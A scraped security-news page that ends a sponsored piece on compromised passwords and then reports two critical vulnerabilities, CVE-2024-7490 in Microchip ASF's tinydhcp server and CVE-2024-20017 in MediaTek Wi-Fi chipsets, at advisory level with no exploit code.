However, even strong passwords can be compromised and there need to be measures in place to detect this. As once compromised, the cracking time for a password in the bottom right of the above table turns to 'instantly.' Organizations need a joined-up strategy to make sure they are covering themselves against both weak and compromised passwords.

If you're interested in managing all of the above in an automated way from a simple-to-use interface within Active Directory, Specops Password Policy could be a valuable tool in your cybersecurity armory. Through its Breached Password Protection service, Specops Password Policy can continuously check and block the use of more than 4 billion unique known compromised passwords. See for yourself with a live demo.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Why 'Never Expire' Passwords Can Be a Risky Decision 

A critical security flaw has been disclosed in the Microchip Advanced Software Framework (ASF) that, if successfully exploited, could lead to remote code execution.
The vulnerability, tracked as CVE-2024-7490, carries a CVSS score of 9.5 out of a maximum of 10.0. It has been described as a stack-based overflow vulnerability in ASF's implementation of the tinydhcp server stemming from a lack of

IoT Security / Vulnerability

A critical security flaw has been disclosed in the Microchip Advanced Software Framework (ASF) that, if successfully exploited, could lead to remote code execution.

The vulnerability, tracked as CVE-2024-7490, carries a CVSS score of 9.5 out of a maximum of 10.0. It has been described as a stack-based overflow vulnerability in ASF's implementation of the tinydhcp server stemming from a lack of adequate input validation.

"There exists a vulnerability in all publicly available examples of the ASF codebase that allows for a specially crafted DHCP request to cause a stack-based overflow that could lead to remote code execution," CERT Coordination Center (CERT/CC) said in an advisory.

Given that the software is no longer supported and is rooted in IoT-centric code, CERT/CC has warned that the vulnerability is "likely to surface in many places in the wild."

The issue impacts ASF 3.52.0.2574 and all prior versions of the software, with the agency also noting that multiple forks of the tinydhcp software are likely susceptible to the flaw as well.

There are currently no fixes or mitigations to address CVE-2024-7490, barring replacing the tinydhcp service with another one that does not have the same issue.

The development comes as SonicWall Capture Labs detailed a severe zero-click vulnerability affecting MediaTek Wi-Fi chipsets (CVE-2024-20017, CVSS 9.8) that could open the door to remote code execution without requiring any user interaction due to an out-of-bounds write issue.

"The affected versions include MediaTek SDK versions 7.4.0.1 and earlier, as well as OpenWrt 19.07 and 21.02," the company said. "This translates to a large variety of vulnerable devices, including routers and smartphones."

"The vulnerability is a buffer overflow as a result of a length value taken directly from attacker-controlled packet data without bounds checking and placed into a memory copy. This buffer overflow creates an out-of-bounds write."

A patch for the vulnerability was released by MediaTek in March 2024, although the likelihood of exploitation has increased with the public availability of a proof-of-concept (PoC) exploit as of August 30, 2024.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#vulnerability